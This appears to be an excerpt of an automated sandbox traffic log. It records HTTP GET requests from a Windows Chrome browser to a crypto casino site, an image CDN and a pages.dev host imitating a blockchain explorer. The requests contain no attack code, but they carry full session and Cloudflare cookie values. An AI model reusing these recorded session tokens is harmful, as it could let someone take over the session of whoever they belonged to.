            Source: global trafficHTTP traffic detected: GET /assets/icon-g-DjQwb4.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/workbox-window.prod.es5-Cr_0OO2S.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /api/account/get/ HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /coin/USD.rect.png HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/cookie-tVC57MhX.png HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /cache/game/support/system/conf/ HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/styles.css HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /assets/bingo-Cj_fMpbj.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif HTTP/1.1Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.286664913.1727486162; _ga_TWEL8GRQ12=GS1.1.1727486162.1.0.1727486162.0.0.0
            Source: global trafficHTTP traffic detected: GET /assets/logo-BjYZztWT.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /socket.io/?Accept-Language=en&EIO=3&transport=websocket HTTP/1.1Host: socketv2.bcgame.skConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://bcgame.skSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=Sec-WebSocket-Key: y5AM2ZL2btxLedMb4Ahosg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
            Source: global trafficHTTP traffic detected: GET /assets/racing-BfvulUJj.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /game/image/13106_The%20Zeus%20vs%20Hades.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/15935_Sugar%20rush%201000.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/8a83305a67.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /assets/banner-DCWqOOaK.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /game/image/fab0e3ca6b.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/4f7e7099e6.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /game/image/90ba079bba.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100 HTTP/1.1Host: bc.imgix.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /modules/lottery2/remoteEntry.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/wr_utils.dist-DvgtdgCy-CUXsbV0Z.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /modules/bonus2/remoteEntry.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/ThrowAndHighRolles-DADNM0eC.js HTTP/1.1Host: bcgame.skConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; visit-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-url=https%3A%2F%2Fbcgame.sk%2F%3Fspin%3Dtrue%26i%3Dp3uc729n%26utm_source%3Dp3uc729n; invitation-view-id=; JSESSIONID=NTFiZjEyNDYtMGYzZC00MTU2LTg1MmItY2IzOTdhYzYxYTU3
            Source: global trafficHTTP traffic detected: GET /assets/casino-9P3_MIUy.png HTTP/1.1Host: bcgame.skConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bcgame.sk/?spin=true&i=p3uc729n&utm_source=p3uc729nAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: invitation-alias-code=p3uc729n; utm_source=p3uc729n; __cf_bm=Hd0brld5t1.JuEsixLaPxhEP6n8VYeVKTA5vv1Bkr2E-1727486203-1.0.1.1-RPq6Ul41U.xtRslhi.RKES61Yyh5gD9jBja5JBJhq4EgMWSSURhsr88guxqB3rxrY_XL4K_73F0aDApiV40Vrg; SESSION=01cmbzgxyxlngg19236339ce7e381fa3023bf1af2ec2eace74; 